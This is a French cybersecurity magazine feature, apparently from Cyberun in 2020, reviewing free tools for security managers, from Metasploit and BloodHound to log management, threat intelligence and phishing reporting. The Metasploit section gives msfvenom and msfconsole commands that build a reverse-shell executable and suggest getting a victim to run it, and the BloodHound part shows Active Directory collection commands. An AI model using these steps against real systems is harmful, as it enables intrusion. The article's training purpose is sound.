1. La trousse à outils
Attaquer pour mieux défendre _02
Superviser _04
Se renseigner _06
Se préparer au pire _08
Améliorer les applications _10
Les grognements de Cy-Bear _12
10 autres outils proposés par nos experts _12
S O M M A I R E
12 outils (gratuits) à essayer
pour les RSSI... et les autres !
Les situations de crise nécessitent de larges compétences
transverses, mais également des connaissances techniques
approfondies. Pour pouvoir décider rapidement et efficacement,
le RSSI et, plus généralement, les top-managers en sécurité vont
puiser dans l’ensemble de leur culture cyber, mais vont également
devoir (re-)mettre “les mains dans le cambouis”.
Cet aspect technique est parfois délaissé, voire décrié, en raison
d’autres impératifs. Pourtant, c’est un point clé pour mieux envisager
les solutions, en connaître les limites et construire une stratégie,
tout en améliorant la communication avec les équipes opérationnelles.
Culturellement, la cybersécurité repose sur une dichotomie entre
le secret et le partage. L’open source est l’une des clés de traçabilité
des solutions. Les développements communautaires fleurissent,
tout comme les groupes plus “dark”. Résultat, des centaines
d’outils gratuits sont à notre disposition pour mieux connaître
le fonctionnement des attaques, pour les détecter, pour les gérer,
ou encore les éviter. Loin de se vouloir exhaustifs, nos experts
vous en proposent une douzaine. Il s’agit d’en découvrir le fonction-
nement de façon pratique, de vous guider dans leur utilisation :
se former (voir combien il est simple de mener une attaque...),
renforcer sa résilience (sensibiliser sur le spam et préparer des
contre-mesures), gagner en maturité en attendant de pouvoir passer
à des solutions plus avancées (par exemple dans le cas de la gestion
des logs ou pour sécuriser les annuaires Active Directory), ou encore
simplifier ses processus organisationnels. A vous de piocher dans
cette trousse à outils en fonction des besoins de votre organisation.
5 idées à retenir…
“Outils gratuits” équivaut à “pas de frais de licence”.
Le coût humain/temporel n’est toutefois pas à négliger.
Prendre le temps d’essayer par soi-même des
solutions peut provoquer une amélioration sensible
de sa maturité technique, préjudiciable aux discours
marketing trop édulcorés.
Les solutions open source ou gratuites permettent
de débroussailler des problématiques, créer des PoC
et faire avancer l’entreprise.
De plus en plus d’outils gratuits disposent également
de versions “commerciales”, proposant une assistance
technique, une interface plus avancée...
Pour choisir entre plusieurs solutions gratuites
“concurrentes”, regardez la fréquence des mises
à jour, la taille des communautés de développeurs
et la qualité des forums de discussion.
J U I L
2 0 2 0
12
C Y B E R S E C U R I T Y S T R AT E G I E S
c y b e r u n . n e t
Toolbox
2. _Cyberun#12
Plus besoin d’être un génie pour utiliser des outils d’attaque, fortement
démocratisés. Le temps nécessaire est souvent réduit à quelques
minutes, voire quelques secondes.
ATTAQUER POUR MIEUX DÉFENDRE
_02 / _03
_01 : Lancer une attaque
L’activité d’audit de sécurité, qui vise à tester votre degré de
vulnérabilité à certaines failles de sécurité des systèmes
d’information, fait largement appel à des produits open
source, tels que Nessus – qui, à l’origine, était gratuit – et
Metasploit, qui dispose d’une version open source. Nessus est
un scanneur de vulnérabilités, alors que Metasploit, dans sa version gratuite,
est plutôt un framework de vulnérabilités et d’exploits.
Entièrement développé en langage Ruby, il intègre des modules propres à certains
exploits que l’on peut développer en Ruby, Perl, PHP, C++ ou C. Le produit
s’enrichit grâce à une large communauté de développeurs qui s’occupe d’inclure
nombre de failles (CVE) très rapidement. Avec son large panel de modules,
Metasploit permet la collecte d’informations/de traces réseaux, la prise de contrôle
machine (bind shell/reverse shell), l’escalade de privilèges, mais aussi des keyloggers
ou d’outils permettant la capture d’écran de la machine victime.
Plus de 2 000 modules (“exploits”) sont disponibles, permettant quasiment à tout
un chacun de lancer une attaque. Si Nessus se concentre plutôt sur des
vulnérabilités réseaux, Metasploit va permettre de mettre à mal des logiciels
de protection comme les antivirus ou les firewalls personnels. Il est intégré
aux distributions Linux Kali ou ParrotOS ou peut être téléchargé depuis
www.metasploit.com (une version Windows existe également).
Commençons par créer une “charge”, ou payload. Depuis le dossier metas-
ploit-framework/bin, lancez la commande msfvenom -p windows/meterpreter/
reverse_tcp lhost=192.168.0.100 lport=8080 -f exe > monmalware.exe en chan-
geant (systématiquement) 192.168.0.100 par l’adresse IP de votre machine. Trouvez
un moyen pour que le programme monmalware.exe soit téléchargé, puis exécuté
sur la machine de votre victime. En parallèle, saisissez :
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse _ tcp
set lhost 192.168.0.100
set lport 8080
exploit
Lorsque monmalware.exe sera lancé (si le port 8080 est bien accessible), un shell
sera disponible (indiqué par meterpreter >). Tapez par exemple “dir c:” pour obtenir
la liste des fichiers du poste de la victime.
Boîte à outils exceptionnelle, Metasploit se targue
d’être l’outil le plus utilisé en test d’intrusions.
Metasploit est gratuit en version ligne de com-
mande. Depuis son acquisition par la société
Rapid 7 en 2009, il existe une version pro payante
qui dispose d’une interface graphique et qui
inclut la grande majorité des modules. Depuis sa
version 2017, Metasploit a intégré des outils de
fuzzing, qui permettent d’injecter des données
aléatoires. Vous pouvez donc tester vos applica-
tions, voir leurs réactions et détecter une faille
sur l’application en tant que telle.
PaloAltoNetworksutiliseMetasploit,parexemple,
dans le cas de proof of concept quand le client
souhaite tester certaines attaques précises. Il est
également utilisé dans nos environnements de
démo afin de montrer comment notre plateforme
peut prévenir les attaques. Nous l’utilisons
également dans les environnements dédiés à
l’éducation (ainsi, Metasploit est intégré à notre
environnement cloud dédié).
BloodHound (en référence à la race de
chien limier) est un projet open source
(gratuit/GNU General Public License) et il
est principalement maintenu par Andrew
Robbins de la société SpecterOps, qui
développe des outils professionnels pour
les Red Teams. Mais l’origine de Blood-
Hound est bel et bien française ! En 2014,
deux membres de l’ANSSI, Lucas Bouillot
et Emmanuel Gras, rédigent Chemins
de contrôle en environnement Active
Directory, qui sera le fondement de l’outil
BloodHound, à savoir la théorie des
graphs appliquée à la sécurité Active
Directory. Régulièrement utilisé lors des
attaques sur Active Directory, le code de
BloodHound est également intégré à
certains malwares, permettant l’analyse
des mauvaises configurations Active
Directoryetledéploiementàl’échelledela
charge de chiffrement. Depuis, Emmanuel
Gras a cofondé la société Alsid avec Luc
Delsalle : Alsid for AD est une solution
s’adressant aux professionnels de la sécu-
rité permettant de mettre en évidence les
mauvaises configurations liées à Active
Directory et vous explique comment les
corriger. Alsid for AD vous permettra
également d’être alerté en temps réel si
un nouveau chemin apparaît en capturant
l’ensemble des modifications réalisées
dans Active Directory.
FRÉDÉRIC NAKHLÉ | Senior Manager System Engineering EMEA, Palo Alto Networks
METASPLOIT
BLOODHOUND
SYLVAIN CORTES | Security Evangelist, Alsid
BloodHound permet d’explorer et de comprendre les chemins de
compromission au sein de l’annuaire Active Directory (AD) afin d’en
détecter les faiblesses. Outil classique des Red Teams, il présente
sous une forme graphique explicite les différents chemins exploi-
tables (liés à des mauvaises configurations de l’AD) afin de devenir
administrateur de domaine sur l’environnement cible. Il n’est
toutefois pas un outil d’attaque directe, au sens où il ne permet pas,
par exemple, d’exécuter des reverse shells, de capturer des mots de
passe ou d’injecter des DLL.
La cartographie de l’infrastructure est tout à fait primordiale pour un
attaquant, car elle lui permettra de cibler les ressources ou objets à
compromettre pour rapidement arriver à ses fins. Dans un Active
Directory de plusieurs milliers d’objets, il est nécessaire pour l’atta-
quant ou le malware d’accélérer son processus de compromission en
visant les objets principaux qui possèdent des “faiblesses”. Ces
faiblesses peuvent être d’ordre structurel ou comportemental, mais
l’idée est de toucher directement au but en ayant, au préalable, par-
faitement cartographié l’environnement pour gagner en efficacité.
Pour installer BloodHound et ses dépendances sur un système, par
exemple sur une machine sous Windows 10, vous devez être admi-
nistrateur local de la machine. Néanmoins, vous n’aurez pas besoin
d’être administrateur du domaine Active Directory pour utiliser l’outil,
ce qui est d’ailleurs logique, puisque l’objectif de BloodHound est
justement de définir les chemins d’attaque pour le devenir ! Il suffira
d’utiliser un compte utilisateur de domaine sans pouvoirs particuliers,
permettant la lecture des objets Active Directory via le protocole
LDAP, ce qui est un droit par défaut de tous les utilisateurs créés
dans Active Directory.
Pour réaliser votre installation, assurez-vous que les packages Java
pour votre environnement ainsi que le .NET Framework 3.5 sont
installés. La version communautaire (gratuite) du serveur Neo4j
est également requise. Utilisé dans de nombreux projets commu-
nautaires et applications professionnelles et disposant d’une large
communauté d’utilisateurs, Neo4j est un système de gestion de
bases de données basé sur les graphs.
Rendez-vous ensuite sur GitHub (https://github.com/BloodHoun-
dAD/BloodHound) et téléchargez à la fois la version compilée
(Blood-Hound-win32-x64.zip) et la version non compilée.
Neo4j est un système de gestion de bases de données basé sur les
graphs, développé en Java par la société Neo Technology. Une
version communautaire est disponible en open source. La première
étape consiste à collecter les données à l’aide de SharpHound (situé
dans le répertoire Ingestors). Depuis une fenêtre de commande,
rendez-vous dans le répertoire Ingestors et lancez SharpHound.exe
--CollectionMethod All. Un fichier ZIP sera généré dans le même
répertoire. Pour l’injecter, ouvrez l’interface principale en vous
rendant dans le dossier BloodHound-win32-x64, puis en lançant
BloodHound.exe. Une fois l’authentification à Neo4j effectuée,
importez le fichier ZIP en cliquant sur le bouton Upload Data. Le
premier graph apparaît. Il faut distinguer les nodes, les edges et les
paths. Les nodes sont globalement des objets – un utilisateur, une
machine, un groupe, un domaine. Les edges sont les relations entre
les objets – l’appartenance à un groupe, le fait d’être administrateur
d’un objet. Le path est un ensemble de nodes connectés par des
edges et définit un chemin d’attaque.
Le bouton Queries présente des requêtes prêtes à l’usage et permet
de lancer les premières recherches simples. L’une des meilleures
requêtes préformatées pour commencer l’exploration des chemins
de compromission est la requête Shortest Paths to High Value
Targets.Legraphvousprésenteraainsilesrelationsentrelesdifférents
objets du domaine, avec notamment les comptes à pouvoir et leurs
groupes, sur quelles machines les comptes à pouvoir ont déjà
ouvert des sessions, quel groupe est capable d’administrer quel
objet, les liens d’application des stratégies de groupe (GPO). Si vous
trouvez un administrateur local connecté sur une machine, un outil
tel que Mimikatz pourra jouer une attaque de type “pass-the-hash”
afin de devenir administrateur du domaine.
_02 : Cartographier les chemins de compromission Active Directory
Exemple de graph résultant de la requête Shortest Paths
to High Value Targets
L A T R O U S S E À O U T I L S
3. _Cyberun#12
Contrôler le bon fonctionnement des systèmes, suivre les processus projets
et leur avancée, consolider les logs : autant de clés pour obtenir une vision
à 360° de ses systèmes d’information.
SUPERVISER
_Cyberun#12
Toutes les entreprises disposent
d’outils de sécurité IT, mais que
se passe-t-il s’ils ne sont pas
opérationnels ? C’est là que la
supervision assure sa fonction
de méta-sécurité à 360 °.
Dans le cas d’un antivirus, par
exemple, PRTG permet de
contrôler que l’ensemble du
parc de machines est couvert,
le niveau de mise à jour pour
chacune d’entre elles, et
d’établir des statistiques
globales de détections de virus.
De plus, avec ses fonctions
natives et inédites de détection
de comportements inhabituels,
PRTG permet d’anticiper
d’éventuelles intrusions sur
le réseau de l’entreprise.
Des capteurs personnalisés
qui adaptent de nombreux
scripts libres de droits sont
aussi disponibles.
L’une des grandes forces de
PRTG est d’être très simple à
prendre en main, de ne
nécessiter aucune compétence
spécifique.
La version gratuite de PRTG
permet de réaliser de nombreux
POC en toute liberté avant de
passer, si besoin, à une version
payante pour augmenter
le nombre de capteurs.
https://www.fr.paessler.com/
download/prtg-download
Dans une précédente vie entrepreneuriale, j’ai utilisé
Graylog comme log manager avec l’idée de développer
une couche SIEM afin de créer une plateforme de
protection des applications. Cette plateforme était
constituée de firewalls, IPS, WAF... qui analysaient
le trafic pour détecter les comportements anormaux,
et donc de potentielles attaques. Ces divers éléments
généraient donc des quantités de logs qu’il fallait
analyser. Un syslog aurait été un simple réceptacle et un
SIEM un investissement trop important pour une jeune
entreprise. Graylog a montré ses capacités à centraliser
les logs quel que soit le format. L’interface d’analyse
d’événements facilite le croisement des informations
entre les sources de données.
En outre, la plateforme disposait d’une adresse IP
publique inutilisée sur laquelle tout le trafic était bloqué,
mais néanmoins enregistré. Ce trafic représente
principalement celui des bots, malveillants ou non.
“Le bruit de fond de l’Internet” montrait l’origine des IP
qui ont “frappé à la porte”, le malware Mirai (port 7547)
ou de bots en recherche d’accès telnet (port 23) ou SSH
(port 22) pour de futures tentatives d’intrusion.
FABIEN PEREIRA VAZ | Technical Sales Manager, Paessler France
_03 : Supervision des services et des réseaux
PRTG NETWORK MONITOR
_04: Outiller l’intégration de la sécurité dans le cycle de vie des projets
BENJAMIN LEROUX | Marketing & Innovation, Advens
BERTRAND MÉENS | CTO & Membre du CESIN
GRAYLOG
RETOUR D’EXPÉRIENCE : GESTION PROJET | AUCHAN
Les processus comme l’intégration de la sécurité
dans le cycle de vie des projets (ISP) sont vite
confrontésàdesdifficultésliéesauvolumedeprojets,
comment capitaliser
sans ralentir le proces-
sus projet. A minima, il
va falloir à chaque fois
réaliser une analyse de risques, produire un
plan de traitement adapté et suivre sa
bonne implémentation afin de respecter la
politique interne, se mettre en conformité
(GDPR, RGS, LPM, etc.), voire répondre aux
attentes d’un client stratégique.
Il y a quelques années, il fallait rédiger un
dossier de sécurité, document “à trous” que
le chef de projet devait remplir, avec souvent
son courage comme seul soutien. En évo-
luant vers un outillage de type Excel ou
équivalent, la démarche s’est simplifiée.
Ce type de classeur se compose générale-
ment de trois éléments. Le questionnaire de
qualification initiale évalue le niveau de
sécurité à atteindre, via une série de questions simples sur le volet
fonctionnel (besoins DICP, nature des données, utilisateurs ciblés, etc.)
comme technique (hébergement interne ou externe, technologies
nouvelles, etc.). La liste de mesures de sécurité préconisées, issues d’un
catalogue de mesures types, regroupe les mesures nécessaires à la
qualification. Enfin, le tableau de suivi de
l’application des mesures de sécurité va
permettre au projet d’acter leur mise en
place ou d’échanger avec le RSSI en cas de
besoin (blocage, difficulté, etc.) et de prouver
l’atteinte du niveau de sécurité souhaité.
Bien que ce type d’outil facilite l’ISP, il
subsiste des difficultés : comment suivre
l’ensemble des projets sans perdre des
fichiers Excel ? Comment utiliser l’outil à
plusieurs, ou conserver l’historique des
changements ? Ces questions ont mené
Auchan, avec l’expertise d’Advens, à imaginer
unportailwebcollaboratif.Le“DigitalSecurity
Workplace” intègre le module KB, une
version web de la politique de sécurité des
SI (PSSI), sous forme d’une base de données
requêtable et une version web de l’ISP,
appelée SWITS (Security Within IT Services).
ChaqueévolutiondelaKB(PSSI)esttransmise
automatiquement aux projets concernés. Les justifications des chefs
de projet sont tracées, tout comme les revues des RSSI.
_5: Une gestion modernisée des logs
Le SIEM est la pierre angulaire de l’outillage du
Security Operation Center (SOC), mais beaucoup
d’entreprises n’ont ni la maturité, ni le budget. Entre
“rester aveugle sur l’activité de son SI” et mettre en
œuvre un projet de SOC, un palier intermédiaire
permet de faire mûrir son organisation en améliorant
la gestion de ses logs.
Les solutions open source ont largement fait leurs preuves en cyber
(Nessus, Snort, pfSense, etc.) ; la gestion des logs n’est pas une exception
avec syslog-ng ou Prelude, et plus récemment avec l’arrivée de la stack
ELK (Elasticsearch/Logstash/Kibana) qui nécessite toutefois des compé-
tences pour bien l’exploiter. Graylog est une solution packagée de gestion
des logs avec une version open source déjà intéressante et une version
enterprise qui lorgne vers le SIEM.
Graylog intègre Elasticsearch pour gagner en performance lors de
requêtes,dispose d’une IHM moderne et d’une API REST (interopérabilité
avec d’autres applications). Il propose la collecte facilitée des logs,
l’analyse visuelle des logs, des tableaux de bord personnalisables, des
alertes avec notification par email ou messagerie instantanée (Slack,
Teams, etc.), et des droits multi-utilisateurs.
Graylog propose une marketplace de modules complémentaires, tels que
de nombreuses librairies (gratuites) pour l’intégration spécifique de logs.
_04 / _05
“Le portail DSW rend la connaissance
sécurité facilement accessible
à tous. Il est au cœur des processus
de sécurité d’Auchan Retail.
Il apporte visibilité, communication,
industrialisation des processus…”
explique Frédérick Meyer, CISO
d’Auchan Retail. “Le SWITS facilite
le processus d’ISP, l’uniformise
entre les pays. Grâce à la notion de
dépendance, il est vecteur d’économies
et de valeur ajoutée, à tel point
que d’autres enseignes et d’autres
métiers s’y intéressent : DPO, contrôle
interne, audit interne, etc.”
PRTG Network Monitor est une solution de supervision qui permet d’obtenir une
visibilité complète sur la disponibilité et les performances de l’ensemble des
infrastructures, systèmes et réseaux de l’entreprise. Elle est donc utile pour les
entreprises de tout secteur en tant que complément aux outils traditionnels
de cybersécurité, afin de s’assurer que ceux-ci remplissent bien leur rôle de
protection.
PRTG permet également d’anticiper des menaces potentielles grâce à la détection de comporte-
ments inhabituels sur le réseau ou encore d’événements corrélés, en se basant sur l’historique
d’utilisation. La supervision est aussi un outil clé pour lutter contre le Shadow IT, puisqu’elle permet
de détecter les équipements connectés au réseau sans autorisation, à l’aide d’un scan récurrent.
Une fois PRTG installé sur un PC sous Windows et connecté au réseau (version Linux en Beta et
version cloud PC/Mac hébergée par Paessler également disponibles), le logiciel propose d’effectuer
un scan automatique de tous les équipements et machines du réseau de l’entreprise pour y déployer
des capteurs. Ce sont eux qui vont permettre
d’obtenir des métriques sur chaque système,
routeur, switch ou application de l’entreprise,
afin de les superviser. PRTG propose plus de
260 types de capteurs prédéfinis (bande
passante, sites web, SNMP, serveurs virtuels,
bases de données, etc.) et la possibilité de créer
ses propres capteurs et scripts.
La version d’évaluation de PRTG permet de
déployer un nombre illimité de capteurs durant
30 jours, puis devient automatiquement une
version gratuite limitée à 100 capteurs actifs,
mais sans aucune limite de temps. Les indica-
teurs supervisés par les capteurs sont rassemblés dans un ou plusieurs tableaux de bord person-
nalisables, rapides et simples à consulter depuis l’application Desktop, une interface web ou un
appareil mobile iOS/Android. Des alertes sur des dépassements de seuil peuvent être configurées
afin de recevoir des notifications par email ou SMS, mais aussi d’exécuter un programme si
nécessaire.
Tous les protocoles et technologies incontournables (SNMP, WMI, SSH, API REST, etc.) ainsi que les
applications et équipements d’éditeurs (Cisco, Dell, HP, IBM, NetApp, Linux, AWS, etc.) sont pris en
charge par PRTG. En termes de sécurité, PRTG peut superviser les solutions Anti-DDOS, IPS/IDS,
les firewalls et antivirus, les reverse proxies, les mises à jour système ou des équipements physiques
comme des caméras de sécurité.
L A T R O U S S E À O U T I L S
4. Construire une base de connaissances sur les menaces visant l’entreprise
permet d’améliorer fortement sa stratégie cyber, sans pour autant nécessiter
des moyens financiers très importants.
SE RENSEIGNER
_Cyberun#12 _06 / _07
OpenCTI est une plateforme ouverte d’analyse de la
cybermenace. L’outil, intégralement open source, est
aujourd’hui disponible à l’usage de l’ensemble des
acteurs de la “Threat Intelligence”. L’application leur
permet ainsi de stocker, d’organiser, de visualiser et
partager leurs propres connaissances en la matière.
L’outil est architecturé autour des trois niveaux de connaissances.
Connaissances techniques ou tactiques : cette catégorie regroupe par
exemple les indicateurs de compromission, les exemples d’emails de
phishing, les artefacts, les listes d’adresses IP ou d’autres éléments obser-
vables. Ce sont les éléments techniques qui caractérisent une attaque.
Connaissances opérationnelles : moins techniques, il s’agit là de décrire
les tactiques des attaquants ou TTP (Techniques, Tactiques et Procédures)
utilisées pour entrer et assurer la latéralisation de l’attaque. On y retrouve
les types de malwares et les tactiques utilisés.
Connaissances stratégiques : on parle ici des grands enjeux comme la
typologie des victimes (secteur industriel particulier, taille d’organisation,
etc.), de l’attribution (qui a lancé l’attaque), de la motivation du groupe
cybercriminel (lucrative, destruction, espionnage, etc.).
L’une des grandes forces d’OpenCTI est de permettre de visualiser cette
connaissance sur les trois niveaux en même temps, ce qui donne accès
à une lecture croisée par secteur/type de cybercriminels/indicateurs de
compromission, par exemple.
Le projet OpenCTI dépasse les 400 000 téléchargements, possède plus de
20 connecteurs vers diverses sources de CTI et compte une vingtaine de
contributeurs actifs. Plus de 500 organisations dans le monde l’utilisent, dont
l’ANSSI, le CERT-EU, ClearSky Sec, ou encore Thales. Cette plateforme est
utilisable par toute entreprise ou agence publique, quelle que soit sa taille,
qui souhaite s’équiper d’un outil puissant et gratuit de gestion de la connais-
sance en matière d’analyse de la cybermenace. La plateforme peut s’installer
en version on-premise ou dans le cloud, au choix. Vide au départ, OpenCTI
possède de nombreux connecteurs qui permettent d’intégrer les grandes
sources de Threat Intelligence privées comme open source.
Attaché à OpenCTI et contributeur depuis le début, je
crois que la démocratisation de l’usage de la CTI est
critique pour la prévention et la maîtrise des risques.
Développé par l’ANSSI avec le CERT-EU, le projet est
unique par les cas d’usage qu’il couvre et la façon dont
il a été conçu (décentralisé, scalable). Open source
depuis juin 2019, il a reçu le soutien de contributeurs
comme Thales, DCSO et IBM, en plus de la commu-
nauté open source.
Récemment, Thales recherchait une solution pour
partager les flux de Threat Intelligence liés à la Covid-19.
Cette connaissance devait être disponible pour les
ingénieurs, SOC et RSSI du secteur de la santé, chacun
ayant besoin d’un niveau d’analyse différent. Déployée
en une semaine, OpenCTI a permis d’agréger l’en-
semble des flux et sources de CTI à la disposition de
Thales, puis de les partager avec les parties prenantes.
En plus de 300 000 indicateurs de compromissions mis
à disposition, la modélisation a permis de visualiser
rapidement les dernières campagnes et les tactiques
utilisées.
SAMUEL HASSINE | Directeur EDR et sécurité Europe du Sud, Tanium
_06 : Plateforme de Threat Intelligence OPENCTI
_07: Des sources de renseignements
ouvertes, adaptées au marché français
Quand on bâtit une bibliothèque de connaissances de Threat Intelligence,
il faut couvrir tous les aspects du renseignement (opérationnel, tactique
et stratégique). En plus de sources commerciales, notre équipe France
recommande les sources gratuites suivantes.
YANN LE BORGNE | Directeur technique Europe, ThreatQuotient
BENOIT GRUNEMWALD
Expert en cybersécurité, ESET France
Covid-19 : le sujet parfait pour une campagne de cyberattaque par courriel
Les cybercriminels se sont jetés sur le sujet Covid-19, allant jusqu’à déposer 5 000 noms de domaines quotidiennement pour dynamiser
leurs campagnes de rançongiciels. Pour y faire face, de nombreuses organisations ont décidé d’offrir des sources de renseignement
spécifiques, ouvertes et gratuites pour la plupart (cf. https://github.com/MishcondeReya/Covid-19-CTI).
Malgré cet élan de solidarité, de nombreuses organisations se sont vues très vite submergées par la difficulté à “ingérer” ces données.
ThreatQuotient met alors à disposition les connecteurs et les dashboards nécessaires pour accélérer la mise en consommation des
contre-mesures et identifier les incidents associés à ces campagnes de rançongiciels.
MITRE ATT&CK
SOURCES OSINT
Adversary reader –
APT Groups and Operations
(https://apt.threattracking.com)
Ce document va vous aider à remplir le
premier niveau de la bibliothèque avec un
référentiel public et une grande quantité de
documentations téléchargeables pour un
stockage local dans la bibliothèque.
MITRE ATT&CK
(https://attack.mitre.org/)
Le MITRE met à disposition son framework
ATT&CK, mais également une base de
connaissances sur un certain nombre d’adver-
saires. Un jeu de données incontournable.
MALPEDIA
(https://malpedia.caad.fkie.fraunhofer.de/)
Service gratuit focalisé sur l’identification et
la fourniture de contexte autour des familles
de malwares, MALPEDIA fournit des informa-
tions de différents niveaux : adversaires,
malwares, samples, règles YARA et contexte.
Il fait le lien entre le “haut niveau” (les adver-
saires) et les capacités d’action (règles YARA)
en s’articulant autour des familles de
malwares.
NVD (https://nvd.nist.gov/)
Publiée par le NIST (National Institute of
Standards and Technology), elle offre la
possibilité à la bibliothèque de couvrir les cas
d’usage associés à la gestion des vulnérabilités
au sens large.
ExploitDB
(https://www.exploit-db.com/)
Couplée à la source précédente, il s’agit
ici d’obtenir à la fois des informations supplé-
mentaires sur des vulnérabilités, mais
aussi des informations sur l’exploitabilité
de celles-ci et, ainsi, de faire un lien vers
des outils et malwares collectés auprès des
sources précédentes.
AlienVault Pulse
(https://otx.alienvault.com/)
Il s’agit là des premiers indicateurs techniques
actionnables dans les défenses de l’organisa-
tion. OTX Pulse permet, sur un mode collabo-
ratif, de partager des informations. Les “pulses”
apportent à la fois les indicateurs techniques
et le lien avec les familles de malwares, les
adversaires... Le choix des événements Pulse
à intégrer localement dans sa bibliothèque se
fait en “suivant” des utilisateurs ou des pulses
en particulier. Il faut toutefois apporter un soin
particulier au choix de ce que l’on souhaite
importer automatiquement, car en multipliant
les sélections, on peut rapidement se retrouver
débordé par la masse d’informations
disponibles.
MISP CIRCL
(https://www.circl.lu/services/misp-
malware-information-sharing-platform/)
MISP apporte aussi son cercle de confiance de
partage, celui du CIRCL : un très bon mix entre
les informations actionnables (indicateurs
techniques) et les données de haut niveau
fournies dans MISP sous le concept de
“galaxies”. Est également disponible la notion
de framework, notamment celui du MITRE
présenté sous forme de Galaxy.
Phishtank (https://www.phishtank.
com/) et Bambenek (https://osint.bambe-
nekconsulting.com/feeds/)
Couramment utilisées par nos clients, elles
fournissent des indicateurs actionnables dans
les défenses. Elle font également le lien avec
les couches supérieures du modèle grâce
au contexte véhiculé (famille de malwares,
notamment).
_08: L’indispensable
taxinomie des
cyberattaques
Intrusion, persistance,
mouvement latéral,
exploitation : comment
décrire un code
malveillant ? Quel est
le rôle de telle ou telle
vulnérabilité ? Quelles
sont les techniques préférées de tel
groupe de pirates ? C’est là que le modèle
MITRE ATT&CK entre en jeu ! Ce référen-
tiel permet de créer des taxinomies
structurées, qui décrivent aussi bien les
attaques (de l’intrusion à l’exfiltration) que
les acteurs malveillants ou les malwares.
Pour le RSSI, c’est un formidable moyen
de relier la posture cybersécurité de son
organisation aux solutions techniques
qui y sont déployées. En positionnant
les solutions de sécurité installées dans
ATT&CK, il visualise immédiatement
les techniques ou les étapes d’une
compromission contre lesquelles elles
se positionnent, et donc les “trous
dans la raquette”.
En plaçant les “scénarii redoutés” d’une
analyse de risque (cf. méthode EBIOS)
sur la même matrice, il apparaît les
risques avérés, qu’aucune des solutions
déployées actuellement ne sait adresser.
Il simplifie les échanges en servant de
“dorsale” : avec le SOC (mettre en
détection des éléments spécifiques en
fonction des trous dans la matrice),
avec la Threat Intelligence (suivre une
menace, et positionner les techniques
d’attaques sur la matrice afin de constater
quelles mesures manquent)...
Chez ESET, MITRE ATT&CK est largement
utilisé, aussi bien publiquement qu’en
interne. Ainsi, notre blog WeLiveSecurity
utilise systématiquement ATT&CK
pour formaliser les acteurs ou
les menaces traitées.
L A T R O U S S E À O U T I L S
5. _08 / _09_Cyberun#12
Une attaque aura forcément lieu : en amont, toute l’entreprise doit améliorer
sa culture cyber, “affûter” ses procédures et outils de restauration, mais aussi
de collecte de preuves.
SE PRÉPARER AU PIRE
_09 : Limiter les
tentatives de phishing
Dans le cadre de la sensibilisation conti-
nue de nos utilisateurs à la cybersécurité,
nous avons déployé une solution visant à
limiter les chances de succès et d’impact d’une attaque par
hameçonnage (phishing). SwordPhish est un outil open
source, facile à déployer, ayant pour pré-requis l’utilisation
du client messagerie Outlook sur les postes de travail. Il
existe d’autres outils aux fonctionnalités similaires, dont
une version made in France, proposée par le CERT Société
Générale, nommée Notify Security.
L’implémentation de notre Système de Management de la
Sécurité de l’Information (SMSI) a nécessité la mise en place
d’indicateurs pour mesurer l’efficacité de nos actions de
sensibilisation à la cybersécurité. Le hameçonnage étant l’un
des vecteurs d’attaque les plus fréquents, nous avons choisi
de travailler sur ce point. Au-delà des mesures techniques
de protection contre les emails malveillants, nous voulions
renforcer le facteur humain en responsabilisant les utilisa-
teurs dans la lutte contre le hameçonnage.
Après plus d’une année d’utilisation, nous avons pu mesurer
tous les bénéfices de ce type d’outil. Les utilisateurs se sont pris
au jeu et reportent des centaines d’attaques par mois. Nous
avons même établi un classement pour valoriser les utilisateurs
les plus actifs dans la remontée d’attaques par hameçonnage !
Au-delà, cet outil nous a permis de définir plus précisément
les services les plus exposés aux tentatives de hameçonnage.
Même si nous savions que les services marketing et support
seraient en haut du classement, nous disposons maintenant
de chiffres pour mieux évaluer les efforts de protection à
fournir.
Je ne peux donc que conseiller la mise en place de ce type
d’outil, très peu coûteux et rapide à déployer, pour mieux
protéger les informations de vos entreprises face aux vecteurs
privilégiés d’attaques que sont les hameçonnages.
Les modules et les cibles choisis avec cette ligne de commande sont très
limités en termes de nombre d’artefacts collectés, ils doivent être ajustés
pour correspondre aux logiciels principaux présents dans l’environnement
de l’entreprise. Notez que le résultat du script de collecte ne doit jamais
être écrit dans la partition C: car cela écrase des espaces non alloués,
qui pourraient contenir des artefacts supprimés utiles. Les résultats sont
enregistrés dans le dossier “kape_<hostname>_output”. C’est dans ce
répertoire que se trouve le fichier zip (protégé par un mot de passe :
very_long_secure_password) qui sera analysé par l’équipe CERT.
Cette extension Outlook (add-in) permet à chaque utilisateur d’être
acteur de la protection de l’entreprise contre les tentatives de hame-
çonnage. Pour cela, rien de plus simple ! Une fois le script d’installation
déployé (https://github.com/Schillings/SwordPhish), les utilisateurs
découvrent une nouvelle icône représentant un espadon dans le
bandeaudeleurapplicationOutlook.Lechoixsymboliqued’unpoisson
pour le visuel est important, car il participe à l’adoption de l’outil en
se différenciant des autres fonctionnalités d’Outlook.
Lorsque l’utilisateur
détecte un message
suspect ou malveillant,
un simple appui sur
l’icône de SwordPhish
suffit pour que le mes-
sage soit classé dans
les “spams” de la boîte
mail et soit immédiate-
m e n t t r a n s f é r é à
l’équipe sécurité. Dès
lors, cette dernière
reçoit un email, avec toutes les informations “sources” nécessaires et
le message initial en pièce jointe. Plusieurs fiches réflexes ont été défi-
nies en réponse à ces alertes : cela peut aller d’un simple message de
remerciement à l’utilisateur pour sa participation à la protection des
informations de l’entreprise à un message de sensibilisation et d’alerte
auprès de tous les utilisateurs de l’entreprise, en illustrant l’attaque
par l’un des derniers emails malicieux reçus. En complément, l’équipe
sécurité dispose de toutes les informations nécessaires pour améliorer
les règles de filtrage anti-spam/anti-phishing et déclarer l’attaque
auprès des autorités (par exemple sur la plateforme Pharos).
LUDOVIC LECOMTE | CISO, Inova Software & Membre du CESIN
SWORDPHISH
KAPE (Kroll Artifact Parser and Extractor)
Même dans l’urgence, il est indispensable de conserver
un maximum d’éléments permettant de retracer l’attaque.
Lors d’une réponse à incident – processus durant lequel
une réaction est organisée à un problème ou un fait de
sécurité –, seule une enquête minutieuse peut permettre
d’affirmer, par exemple, qu’une machine ne sera pas à
nouveau compromise. Pour cela, il va falloir collecter un
certain nombre d’artefacts, c’est-à-dire des éléments qui
peuvent être utilisés comme preuves dans le cadre d’une
enquête. Citons par exemple la liste des processus actifs,
la liste des fichiers stockés sur un disque dur, les journaux
d’événementsWindows.Letriageestlaphaseduprocessus
de réponse à incident durant laquelle les artefacts sont
